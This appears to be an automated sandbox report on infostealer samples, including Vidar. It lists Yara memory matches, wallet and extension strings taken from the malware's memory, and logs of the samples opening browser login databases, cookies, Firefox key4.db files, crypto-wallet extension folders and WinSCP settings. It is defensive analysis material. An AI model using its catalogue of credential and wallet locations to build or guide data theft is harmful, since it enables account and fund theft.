Source: Yara match	File source: 0000001F.00000002.2548165139.0000000001001000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2868868289.000000000183B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.2566196660.00000000050D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2288787016.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2655432837.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.2435867329.0000000005510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.2639679163.0000000000111000.00000040.00000001.01000000.00000016.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2336403037.0000000001001000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000003.2626428387.0000000005550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2337888063.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2552036378.000000000193B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2826217416.0000000001001000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ae70ca0159.exe PID: 7396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ae70ca0159.exe PID: 1516, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: PAL947G2R107U02V5ZPL.exe PID: 2084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ae70ca0159.exe PID: 7160, type: MEMORYSTR

Yara detected Vidar stealer

Source: Yara match	File source: 0000002B.00000003.2773380222.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000003.2654040414.00000000047A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002B.00000003.2826935322.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Bjkm5hE.exe PID: 6380, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: dfd80aba08.exe, 00000007.00000003.2328083508.0000000001589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: lectrum","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"
Source: e2b0a87ceb.exe, 00000017.00000002.2610627222.0000000001592000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: dfd80aba08.exe, 00000007.00000003.2371724718.00000000015A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: :"Jaxx Liberty"},{"en":"fihkakfobkmkjojpchpfgcmhfjnmnfpi","ez":"BitApp"},{"en":"kncchdigobghenbbaddojjnnaogfppfj","ez":"
Source: dfd80aba08.exe, 00000007.00000003.2371724718.00000000015A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: orage.json","window-state.json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\Ind59
Source: loqVSeJ.exe, 00000024.00000003.2579845134.00000000050E0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: dfd80aba08.exe, 00000007.00000003.2371724718.00000000015A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ,"ez":"Sui"},{"en":"aholpfdialjgjfhomihkjbmgjidlcdno","ez":"ExodusWeb3"},{"en":"onhogfjeacnfoofkfgppdlbmlmnplgbn","ez":"
Source: e2b0a87ceb.exe, 00000017.00000002.2610627222.0000000001592000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: dfd80aba08.exe, 00000007.00000003.2328083508.0000000001589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: dfd80aba08.exe, 00000007.00000003.2328083508.0000000001589000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\events\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\saved-telemetry-pings\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db\key4.db
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\minidumps\key4.db
